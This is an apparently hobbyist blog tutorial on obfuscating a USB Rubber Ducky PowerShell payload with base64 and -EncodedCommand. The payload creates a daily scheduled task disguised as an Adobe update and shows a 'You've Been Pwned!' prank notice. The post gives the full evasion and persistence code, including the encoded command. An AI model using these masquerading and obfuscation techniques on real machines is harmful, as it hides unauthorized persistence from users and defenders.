Obfuscating PowerShell Commands
I recently wrote a Ducky Script that creates a scheduled task upon plugging a Rubber Ducky into an unlocked PC. While the script is successful, I find it gives away too many clues as to what the script is doing.
PowerShell commands can be obfuscated using base64 and handed to PowerShell through the EncodedCommand parameter. Although the parameter was designed for submitting commands that contain complex quotation marks or curly braces, it can also be used in an attempt to hide what commands a script is running.
The PowerShell commands my Ducky Script runs are as follows:
$action = New-ScheduledTaskAction -Execute 'wlrmdr.exe' -Argument " -s 60000 -f 1 -t You've Been Pwned! -m Remember that USB you plugged in? Pepperidge Farm Remembers. -a o"
$trigger = New-ScheduledTaskTrigger -Daily -At 3:14pm
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "Adobe Acrobat Update Tusk" -Description "This task doesn't keep your Adobe Reader and Acrobat applications up to date with the latest enhancements and security fixes"
This is a benign script that will remind the victim daily that they plugged in an unknown USB stick. I also had the scheduled task disguise itself as an Adobe Reader update task in an attempt to avoid being discovered later on.
Before getting started, PowerShell needs to be told to run all of these commands as a single line. This is done with a semicolon (;). Simply put a semicolon between each command, like so:
$action = New-ScheduledTaskAction -Execute 'wlrmdr.exe' -Argument " -s 60000 -f 1 -t You've Been Pwned! -m Remember that USB you plugged in? Pepperidge Farm Remembers. -a o";$trigger = New-ScheduledTaskTrigger -Daily -At 3:14pm;Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "Adobe Acrobat Update Tusk" -Description "This task doesn't keep your Adobe Reader and Acrobat applications up to date with the latest enhancements and security fixes"
To convert the commands to base64, assign the commands to a variable with a name of your choice. In my case I've gone with $EncodeText. Because the whole thing is wrapped in a double-quoted string, the $ of each variable and every inner double quote must be escaped with a backtick (`) so PowerShell stores them literally instead of expanding them.
$EncodeText = "`$action = New-ScheduledTaskAction -Execute 'wlrmdr.exe' -Argument `" -s 60000 -f 1 -t You've Been Pwned! -m Remember that USB you plugged in? Pepperidge Farm Remembers. -a o`";`$trigger = New-ScheduledTaskTrigger -Daily -At 3:14pm;Register-ScheduledTask -Action `$action -Trigger `$trigger -TaskName `"Adobe Acrobat Update Tusk`" -Description `"This task doesn't keep your Adobe Reader and Acrobat applications up to date with the latest enhancements and security fixes`""
The commands can now be encoded in base64 by running the following command. Note the use of the Unicode (UTF-16LE) encoding: EncodedCommand expects base64 of UTF-16LE text, and a string encoded as UTF-8 will not run.
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($EncodeText))
The base64 text will be displayed on the screen.
This can now be fed into PowerShell using the EncodedCommand parameter. You can pipe the command to Out-Null to have the command run without any output:
PowerShell -EncodedCommand JABhAGMAdABpAG8AbgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHcAbAByAG0AZAByAC4AZQB4AGUAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAIgAgAC0AcwAgADYAMAAwADAAMAAgAC0AZgAgADEAIAAtAHQAIABZAG8AdQAnAHYAZQAgAEIAZQBlAG4AIABQAHcAbgBlAGQAIQAgAC0AbQAgAFIAZQBtAGUAbQBiAGUAcgAgAHQAaABhAHQAIABVAFMAQgAgAHkAbwB1ACAAcABsAHUAZwBnAGUAZAAgAGkAbgA/ACAAUABlAHAAcABlAHIAaQBkAGcAZQAgAEYAYQByAG0AIABSAGUAbQBlAG0AYgBlAHIAcwAuACAALQBhACAAbwAiADsAJAB0AHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBEAGEAaQBsAHkAIAAtAEEAdAAgADMAOgAxADQAcABtADsAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAkAGEAYwB0AGkAbwBuACAALQBUAHIAaQBnAGcAZQByACAAJAB0AHIAaQBnAGcAZQByACAALQBUAGEAcwBrAE4AYQBtAGUAIAAiAEEAZABvAGIAZQAgAEEAYwByAG8AYgBhAHQAIABVAHAAZABhAHQAZQAgAFQAdQBzAGsAIgAgAC0ARABlAHMAYwByAGkAcAB0AGkAbwBuACAAIgBUAGgAaQBzACAAdABhAHMAawAgAGQAbwBlAHMAbgAnAHQAIABrAGUAZQBwACAAeQBvAHUAcgAgAEEAZABvAGIAZQAgAFIAZQBhAGQAZQByACAAYQBuAGQAIABBAGMAcgBvAGIAYQB0ACAAYQBwAHAAbABpAGMAYQB0AGkAbwBuAHMAIAB1AHAAIAB0AG8AIABkAGEAdABlACAAdwBpAHQAaAAgAHQAaABlACAAbABhAHQAZQBzAHQAIABlAG4AaABhAG4AYwBlAG0AZQBuAHQAcwAgAGEAbgBkACAAcwBlAGMAdQByAGkAdAB5ACAAZgBpAHgAZQBzACIA | Out-Null
You can now run Obfuscated PowerShell Commands the way your inner PowerShell Ninja intended.
Check out the Ducky Script on GitHub!